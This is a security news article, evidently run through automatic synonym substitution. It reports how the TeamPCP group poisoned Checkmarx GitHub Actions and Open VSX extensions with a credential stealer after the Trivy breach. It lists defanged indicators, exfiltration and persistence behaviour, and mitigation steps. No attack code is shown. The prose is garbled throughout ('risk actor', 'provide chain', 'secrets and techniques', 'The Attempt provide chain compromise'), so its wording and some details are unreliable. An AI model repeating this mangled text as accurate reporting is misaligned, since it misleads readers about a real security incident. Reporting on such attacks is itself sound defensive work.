Two extra GitHub Actions workflows have grow to be the most recent to be compromised by credential-stealing malware by a risk actor generally known as TeamPCP, the cloud-native cybercriminal operation additionally behind the Trivy provide chain assault.
The workflows, each maintained by the provision chain security firm Checkmarx, are listed under –
Cloud security firm Sysdig mentioned it noticed an equivalent credential stealer because the one utilized in TeamPCP’s operations focusing on Aqua Safety’s Trivy vulnerability scanner and its related GitHub Actions, about 4 days after the breach on March 19, 2026. The Attempt provide chain compromise is being tracked below the CVE identifier CVE-2026-33634 (CVSS rating: 9.4).
“This implies that the stolen credentials from the Trivy compromise had been used to poison further actions in affected repositories,” Sysdig mentioned.
The stealer, known as “TeamPCP Cloud stealer,” is designed to steal credentials and secrets and techniques associated to SSH keys, Git, Amazon Net Companies (AWS), Google Cloud, Microsoft Azure, Kubernetes, Docker, .env recordsdata, databases, and VPNs, together with CI/CD configurations, information from cryptocurrency wallets, and Slack and Discord webhook URLs.
Like within the case of Trivy, the risk actors have been discovered to force-push tags to malicious commits containing the stealer payload (“setup.sh”). The stolen information is exfiltrated to the area “checkmarx[.]zone” (IP tackle: 83.142.209[.]11:443) within the type of an encrypted archive (“tpcp.tar.gz”).
The brand new model creates a “docs-tpcp” repository utilizing the sufferer’s GITHUB_TOKEN to stage the stolen information as a backup technique if the exfiltration to the server fails. Within the Trivy incident, the risk actors used the repository title “tpcp-docs” as an alternative.
“Using vendor-specific typosquat domains for every poisoned motion is a deliberate deception method,” Sysdig mentioned. “An analyst reviewing CI/CD logs would see curl site visitors to what seems to be the motion’s personal vendor area, decreasing the probability of handbook detection.”
The truth that the stealer’s main operate is to reap credentials from CI runner reminiscence permits the operators to extract GitHub private entry tokens (PATs) and different secrets and techniques from when a compromised Trivy motion executes in a workflow. To make issues worse, if these tokens have write entry to repositories that additionally use Checkmarx actions, the attacker can weaponize them to push malicious code.
This, in flip, opens the door to a cascading provide chain compromise, the place one poisoned motion captures secrets and techniques which are used to facilitate the poisoning of different actions.
“The equivalent payload, encryption scheme, and tpcp.tar.gz naming conference affirm this is identical risk actor increasing their attain past the preliminary Trivy compromise,” Sysdig famous. “Code assessment and dependency scanning failed right here as a result of the malicious code was injected right into a trusted motion on the supply.”
In line with Wiz, the assault seems to have been carried out through the compromise of the “cx-plugins-releases” service account, with the attackers additionally publishing trojanized variations of the “ast-results” (model 2.53.0) and “cx-dev-assist” (model 1.7.0) Open VSX extensions. The VS Code Market variations will not be affected.
As soon as the extension is activated, the malicious payload checks whether or not the sufferer has credentials for not less than one cloud service supplier, comparable to GitHub, AWS, Google Cloud, and Microsoft Azure. If any credentials are detected, it proceeds to fetch a next-stage payload from the identical area (“checkmarx[.]zone”).
“The payload makes an attempt execution through npx, bunx, pnpx, or yarn dlx. This covers main JavaScript bundle managers,” Wiz researchers Rami McCarthy, James Haughom, and Benjamin Learn mentioned. “The retrieved bundle comprises a complete credential stealer. Harvested credentials are then encrypted, utilizing the keys as elsewhere on this marketing campaign, and exfiltrated to ‘checkmarx[.]zone/vsx’ as tpcp.tar.gz.”
“On non-CI methods, the malware installs persistence through a systemd person service. The persistence script polls https://checkmarx[.]zone/uncooked each 50 minutes for extra payloads, with a kill change that aborts if the response comprises “youtube”. Presently, the hyperlink redirects to The Present Should Go On by Queen.”
To mitigate the risk, customers are suggested to carry out the next actions with quick impact –
- Rotate all secrets and techniques, tokens, and cloud credentials that had been accessible to CI runners throughout the affected window.
- Audit GitHub Actions workflow runs for any references to tpcp.tar.gz, scan.aquasecurity[.]org, or checkmarx[.]zone in runner logs.
- Search GitHub group for repositories named “tpcp-docs” or “docs-tpcp,” which point out profitable exfiltration through the fallback mechanism.
- Pin GitHub Actions to full commit SHAs slightly than model tags, as tags may be force-pushed.
- Monitor outbound community connections from CI runners to suspicious domains.
- Limit the Occasion Metadata Service (IMDS) from CI runner containers utilizing IMDSv2.
Within the days following the preliminary breach, TeamPCP actors have pushed malicious Docker photos of Trivy containing the identical stealer and hijacked the corporate’s “aquasec-com” GitHub group to tamper with dozens of inner repositories.
They’ve additionally been noticed focusing on Kubernetes clusters with a malicious shell script that wipes all machines when it detects methods matching the Iranian time zone and locale, highlighting a newfound escalation of the group’s modus operandi.
